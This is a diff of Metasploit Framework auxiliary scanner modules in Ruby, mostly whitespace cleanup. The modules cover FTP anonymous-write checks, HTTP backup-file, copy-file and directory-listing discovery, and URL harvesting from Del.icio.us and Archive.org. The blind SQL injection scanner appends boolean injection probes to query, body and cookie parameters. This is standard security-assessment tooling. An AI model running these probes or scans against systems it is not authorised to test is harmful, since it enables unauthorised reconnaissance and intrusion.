|
||||
else
|
||||
print_error("Host #{ip} is not running the service...")
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(target_host)
|
||||
|
||||
begin
|
||||
|
||||
|
||||
res = connect_login(true, false)
|
||||
|
||||
banner.strip! if banner
|
||||
|
||||
dir = Rex::Text.rand_text_alpha(8)
|
||||
if res
|
||||
if res
|
||||
write_check = send_cmd( ['MKD', dir] , true)
|
||||
|
||||
if (write_check and write_check =~ /^2/)
|
||||
@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionError, ::IOError
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Backup File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of possible copies
|
||||
This module identifies the existence of possible copies
|
||||
of a specific file in a given path.
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'.backup',
|
||||
'.bak',
|
||||
'.copy',
|
||||
'.old',
|
||||
'.old',
|
||||
'.orig',
|
||||
'.temp',
|
||||
'.txt',
|
||||
@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
print_status("Found #{wmap_base_url}#{file}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'BACKUP_FILE',
|
||||
:data => "#{file}"
|
||||
)
|
||||
|
||||
|
||||
else
|
||||
print_status("NOT Found #{wmap_base_url}#{file}")
|
||||
print_status("NOT Found #{wmap_base_url}#{file}")
|
||||
#To be removed or just displayed with verbose debugging.
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of Blind SQL injection issues
|
||||
This module identifies the existence of Blind SQL injection issues
|
||||
in GET Query parameters values.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('METHOD', [true, "HTTP Method","GET"]),
|
||||
@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('QUERY', [ false, "HTTP URI Query", '']),
|
||||
OptString.new('DATA', [ false, "HTTP Body Data", '']),
|
||||
OptString.new('COOKIE',[ false, "HTTP Cookies", ''])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
gvars = nil
|
||||
pvars = nil
|
||||
cvars = nil
|
||||
|
||||
rnum=rand(10000)
|
||||
|
||||
|
||||
rnum=rand(10000)
|
||||
|
||||
valstr = [
|
||||
[ 'numeric',
|
||||
[ 'numeric',
|
||||
" AND #{rnum}=#{rnum} ",
|
||||
" AND #{rnum}=#{rnum+1} "
|
||||
],
|
||||
[ 'single quotes',
|
||||
],
|
||||
[ 'single quotes',
|
||||
"' AND '#{rnum}'='#{rnum}",
|
||||
"' AND '#{rnum}'='#{rnum+1}"
|
||||
],
|
||||
[ 'double quotes',
|
||||
[ 'double quotes',
|
||||
"\" AND \"#{rnum}\"=\"#{rnum}",
|
||||
"\" AND \"#{rnum}\"=\"#{rnum+1}"
|
||||
]
|
||||
@ -72,21 +72,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
# Dealing with empty query/data and making them hashes.
|
||||
#
|
||||
|
||||
|
||||
if !datastore['QUERY'] or datastore['QUERY'].empty?
|
||||
datastore['QUERY'] = nil
|
||||
gvars = nil
|
||||
else
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
end
|
||||
|
||||
|
||||
if !datastore['DATA'] or datastore['DATA'].empty?
|
||||
datastore['DATA'] = nil
|
||||
pvars = nil
|
||||
else
|
||||
pvars = queryparse(datastore['DATA'])
|
||||
end
|
||||
|
||||
|
||||
if !datastore['COOKIE'] or datastore['COOKIE'].empty?
|
||||
datastore['COOKIE'] = nil
|
||||
cvars = nil
|
||||
@ -95,56 +95,56 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
|
||||
#SEND NORMAL REQUEST
|
||||
|
||||
#SEND NORMAL REQUEST
|
||||
|
||||
begin
|
||||
normalres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
|
||||
sigtxt = ""
|
||||
|
||||
|
||||
if normalres
|
||||
if normalres.body.empty?
|
||||
print_error("No body to obtain signature")
|
||||
return
|
||||
else
|
||||
sigtxt = normalres.body
|
||||
#print_status("#{sigtxt}")
|
||||
#print_status("#{sigtxt}")
|
||||
end
|
||||
else
|
||||
print_error("No response")
|
||||
return
|
||||
end
|
||||
|
||||
#print_status("Normal request sent.")
|
||||
|
||||
#print_status("Normal request sent.")
|
||||
|
||||
valstr.each do |tarr|
|
||||
|
||||
|
||||
#QUERY
|
||||
if gvars
|
||||
gvars.each do |key,value|
|
||||
gvars.each do |key,value|
|
||||
gvars = queryparse(datastore['QUERY']) #Now its a Hash
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
#SEND TRUE REQUEST
|
||||
gvars[key] = gvars[key]+tarr[1]
|
||||
|
||||
|
||||
|
||||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
@ -152,47 +152,47 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if normalres and trueres
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
normalsize = normalres.body.length
|
||||
|
||||
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
|
||||
|
||||
if reltruesize == normalsize
|
||||
|
||||
if reltruesize == normalsize
|
||||
#If true it means that we have a small better chance of this being a blind sql injection.
|
||||
|
||||
#SEND FALSE REQUEST
|
||||
gvars[key] = gvars[key]+tarr[2]
|
||||
|
||||
|
||||
gvars[key] = gvars[key]+tarr[2]
|
||||
|
||||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => datastore['DATA']
|
||||
}, 20)
|
||||
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
|
||||
#true_false_dist = edit_distance(falseres.body,trueres.body)
|
||||
|
||||
|
||||
|
||||
#print_status("rellenf #{relfalsesize}")
|
||||
|
||||
if reltruesize > relfalsesize
|
||||
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -201,15 +201,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
|
||||
)
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
end
|
||||
else
|
||||
print_status("NO False Response.")
|
||||
print_status("NO False Response.")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
else
|
||||
print_status("Normal and True requests are different.")
|
||||
@ -220,16 +220,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
#DATA
|
||||
|
||||
|
||||
if pvars
|
||||
pvars.each do |key,value|
|
||||
pvars.each do |key,value|
|
||||
pvars = queryparse(datastore['DATA']) #Now its a Hash
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
print_status("- Testing '#{tarr[0]}' Parameter #{key}:")
|
||||
|
||||
#SEND TRUE REQUEST
|
||||
pvars[key] = pvars[key]+tarr[1]
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
@ -237,12 +237,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
begin
|
||||
trueres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
@ -250,55 +250,55 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
if normalres and trueres
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
reltruesize = trueres.body.length-(trueres.body.scan(/#{tarr[1]}/).length*tarr[1].length)
|
||||
normalsize = normalres.body.length
|
||||
|
||||
#print_status("nlen #{normalsize} reltlen #{reltruesize}")
|
||||
|
||||
if reltruesize == normalsize
|
||||
|
||||
if reltruesize == normalsize
|
||||
#If true it means that we have a small better chance of this being a blind sql injection.
|
||||
|
||||
#SEND FALSE REQUEST
|
||||
pvars[key] = pvars[key]+tarr[2]
|
||||
|
||||
|
||||
pvarstr = ""
|
||||
pvars.each do |tkey,tvalue|
|
||||
if pvarstr
|
||||
pvarstr << '&'
|
||||
end
|
||||
pvarstr << tkey+'='+tvalue
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
falseres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'vars_get' => gvars,
|
||||
'vars_get' => gvars,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => datastore['COOKIE'],
|
||||
'data' => pvarstr
|
||||
}, 20)
|
||||
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
|
||||
if falseres
|
||||
#Very simple way to compare responses, this can be improved alot , at this time just the simple way
|
||||
relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length)
|
||||
#true_false_dist = edit_distance(falseres.body,trueres.body)
|
||||
|
||||
|
||||
|
||||
#print_status("rellenf #{relfalsesize}")
|
||||
|
||||
if reltruesize > relfalsesize
|
||||
print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -307,15 +307,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}"
|
||||
)
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
else
|
||||
print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}")
|
||||
end
|
||||
else
|
||||
print_status("NO False Response.")
|
||||
print_status("NO False Response.")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
else
|
||||
print_status("Normal and True requests are different.")
|
||||
@ -324,8 +324,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("No response.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,41 +22,41 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Copy File Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies the existence of possible copies
|
||||
This module identifies the existence of possible copies
|
||||
of a specific file in a given path.
|
||||
},
|
||||
'Author' => [ 'et [at] cyberspace.org' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path/file to identify copies", '/index.asp'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('ErrorCode', [ true, "Error code for non existent directory", 404]),
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use",
|
||||
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
|
||||
]
|
||||
),
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
conn = true
|
||||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
|
||||
ecode = datastore['ErrorCode'].to_i
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
prestr = [
|
||||
'Copy_(1)_of_',
|
||||
'Copy_(2)_of_',
|
||||
@ -66,18 +66,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Copy',
|
||||
'_'
|
||||
]
|
||||
|
||||
|
||||
|
||||
tpathf = datastore['PATH']
|
||||
testf = tpathf.split('/').last
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
#
|
||||
begin
|
||||
randfile = Rex::Text.rand_text_alpha(5).chomp
|
||||
filec = tpathf.sub(testf,randfile + testf)
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => filec,
|
||||
'method' => 'GET',
|
||||
@ -85,13 +85,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}, 20)
|
||||
|
||||
return if not res
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
|
||||
tcode = res.code.to_i
|
||||
|
||||
|
||||
# Look for a string we can signature on as well
|
||||
if(tcode >= 200 and tcode <= 299)
|
||||
|
||||
|
||||
File.open(datastore['HTTP404Sigs']).each do |str|
|
||||
if(res.body.index(str))
|
||||
emesg = str
|
||||
@ -109,10 +109,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ecode = tcode
|
||||
print_status("Using code '#{ecode}' as not found.")
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
conn = false
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
|
||||
return if not conn
|
||||
@ -120,24 +120,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if testf
|
||||
prestr.each do |pre|
|
||||
filec = tpathf.sub(testf,pre + testf)
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => filec,
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain'
|
||||
}, 20)
|
||||
|
||||
|
||||
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
|
||||
if dm == false
|
||||
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
|
||||
print_status("NOT Found #{filec} #{res.code} [#{wmap_target_host}] [#{res.code.to_i}]")
|
||||
end
|
||||
else
|
||||
if ecode != 400 and res.code.to_i == 400
|
||||
print_error("[#{wmap_target_host}] Server returned a 400 error on #{wmap_base_url}#{filec} [#{res.code.to_i}]")
|
||||
else
|
||||
else
|
||||
print_status("[#{wmap_target_host}] Found #{wmap_base_url}#{filec} [#{res.code.to_i}]")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,29 +21,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Directory Listing Scanner',
|
||||
'Description' => %q{
|
||||
This module identifies directory listing vulnerabilities
|
||||
in a given directory path.
|
||||
This module identifies directory listing vulnerabilities
|
||||
in a given directory path.
|
||||
},
|
||||
'Author' => [ 'et' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The path to identify directoy listing", '/'])
|
||||
], self.class)
|
||||
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
end
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
@ -51,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (res and res.code >= 200 and res.code < 300)
|
||||
if res.to_s.include? "<title>Index of /" and res.to_s.include? "<h1>Index of /"
|
||||
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -59,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DIR_LISTING',
|
||||
:data => "#{tpath}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
|
||||
if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>"
|
||||
print_status("Found Directory Listing #{wmap_base_url}#{tpath}")
|
||||
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'HTTP',
|
||||
@ -72,15 +76,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'DIR_LISTING',
|
||||
:data => "#{tpath}"
|
||||
)
|
||||
|
||||
|
||||
end
|
||||
|
||||
else
|
||||
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
|
||||
print_status("NOT Vulnerable to directory listing #{wmap_base_url}#{tpath}")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,4 +1,7 @@
|
||||
#!/usr/bin/env ruby
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
purpose of replaying during a web assessment. Finding unlinked and old pages. },
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
@ -55,30 +58,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||
lastpage = 1
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
list.delete_if{|x| x==nil}
|
||||
list.uniq!
|
||||
list.sort!
|
||||
|
||||
|
||||
return list
|
||||
end
|
||||
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
|
||||
File.open(file_name, 'a') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@ -87,21 +90,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Delicious.com")
|
||||
urls = pull_urls(target)
|
||||
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join("\n") + "\n")
|
||||
else
|
||||
urls.each do |i|
|
||||
puts(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -1,4 +1,7 @@
|
||||
#!/usr/bin/env ruby
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pull Archive.org stored URLs for a domain',
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
replaying during a web assessment. Finding unlinked and old pages. },
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
@ -45,34 +48,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||
response.each do |line|
|
||||
pages << line.gsub!(/(.+>)(.+)(<\/a><br>)\n/, '\2')
|
||||
end
|
||||
|
||||
|
||||
pages.delete_if{|x| x==nil}
|
||||
pages.uniq!
|
||||
pages.sort!
|
||||
|
||||
|
||||
for i in (0..(pages.count-1))
|
||||
fix = "http://" + pages[i].to_s
|
||||
pages[i] = fix
|
||||
end
|
||||
return pages
|
||||
end
|
||||
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
